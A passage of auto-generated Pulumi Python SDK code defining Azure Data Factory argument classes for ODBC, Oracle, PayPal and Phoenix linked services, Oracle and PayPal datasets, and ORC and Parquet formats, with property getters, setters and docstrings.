pulumi.set(__self__, "path", path)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def path(self) -> Optional[Any]:
"""
The OData resource path. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[Any]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class OdbcLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
credential: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
Open Database Connectivity (ODBC) linked service.
:param Any connection_string: The non-access credential portion of the connection string as well as an optional encrypted credential. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param Any authentication_type: Type of authentication used to connect to the ODBC data store. Possible values are: Anonymous and Basic. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] credential: The access credential portion of the connection string specified in driver-specific property-value format.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for Basic authentication.
:param Any user_name: User name for Basic authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'Odbc')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if credential is not None:
pulumi.set(__self__, "credential", credential)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The non-access credential portion of the connection string as well as an optional encrypted credential. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[Any]:
"""
Type of authentication used to connect to the ODBC data store. Possible values are: Anonymous and Basic. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[Any]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def credential(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The access credential portion of the connection string specified in driver-specific property-value format.
"""
return pulumi.get(self, "credential")
@credential.setter
def credential(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "credential", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
User name for Basic authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class OracleLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Oracle database.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'Oracle')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class OracleTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The on-premises Oracle database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the on-premises Oracle database. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'OracleTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the on-premises Oracle database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class OrcFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
deserializer: Optional[Any] = None,
serializer: Optional[Any] = None):
"""
The data stored in Optimized Row Columnar (ORC) format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'OrcFormat')
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@pulumi.input_type
class ParameterSpecificationArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
default_value: Optional[Any] = None):
"""
Definition of a single parameter for an entity.
:param pulumi.Input[str] type: Parameter type.
:param Any default_value: Default value of parameter.
"""
pulumi.set(__self__, "type", type)
if default_value is not None:
pulumi.set(__self__, "default_value", default_value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Parameter type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="defaultValue")
def default_value(self) -> Optional[Any]:
"""
Default value of parameter.
"""
return pulumi.get(self, "default_value")
@default_value.setter
def default_value(self, value: Optional[Any]):
pulumi.set(self, "default_value", value)
@pulumi.input_type
class ParquetFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
deserializer: Optional[Any] = None,
serializer: Optional[Any] = None):
"""
The data stored in Parquet format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'ParquetFormat')
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@pulumi.input_type
class PaypalLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Paypal Service linked service.
:param Any client_id: The client ID associated with your PayPal application.
:param Any host: The URL of the PayPal instance (e.g. api.sandbox.paypal.com).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with your PayPal application.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Paypal')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with your PayPal application.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The URL of the PayPal instance (e.g. api.sandbox.paypal.com).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with your PayPal application.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class PaypalObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Paypal Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'PaypalObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class PhoenixLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
http_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None):
"""
Phoenix server linked service.
:param pulumi.Input[str] authentication_type: The authentication mechanism used to connect to the Phoenix server.
:param Any host: The IP address or host name of the Phoenix server (e.g. 192.168.222.160).
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any http_path: The partial URL corresponding to the Phoenix server (e.g. /gateway/sandbox/phoenix/version). The default value is hbasephoenix if using WindowsAzureHDInsightService.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name.
:param Any port: The TCP port that the Phoenix server uses to listen for client connections. The default value is 8765.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name used to connect to the Phoenix server.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Phoenix')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if http_path is not None:
pulumi.set(__self__, "http_path", http_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
